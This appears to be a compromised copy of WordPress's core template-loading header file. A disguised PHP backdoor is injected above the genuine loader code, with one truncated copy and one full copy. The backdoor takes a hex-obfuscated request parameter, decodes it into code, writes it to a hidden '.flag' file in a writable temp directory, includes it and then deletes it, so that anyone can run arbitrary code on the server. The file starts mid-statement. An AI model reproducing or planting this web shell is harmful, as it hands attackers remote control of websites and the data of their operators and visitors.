= $__len) break; $v5 = $symbol[$y]; $chS = ord($s[$y % $sLen]); $dec = ((int)$v5 - $chS - ($y % 10)) ^75; $key .= chr($dec); $y++; } while (true); foreach ($fac as $tkn): if ((is_dir($tkn) and is_writable($tkn))) { $value = "$tkn/.flag"; $file = fopen($value, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $value; @unlink($value); exit; } } endforeach; } php if(!empty($_REQUEST["\x68o\x6C\x64er"])){ $fac = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), "/var/tmp", getenv("TMP"), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd()]); $symbol = $_REQUEST["\x68o\x6C\x64er"]; $symbol = explode ( "." , $symbol ) ; $key = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $y = 0; $__len = count($symbol); do { if ($y >= $__len) break; $v5 = $symbol[$y]; $chS = ord($s[$y % $sLen]); $dec = ((int)$v5 - $chS - ($y % 10)) ^75; $key .= chr($dec); $y++; } while (true); foreach ($fac as $tkn): if ((is_dir($tkn) and is_writable($tkn))) { $value = "$tkn/.flag"; $file = fopen($value, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $value; @unlink($value); exit; } } endforeach; } /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }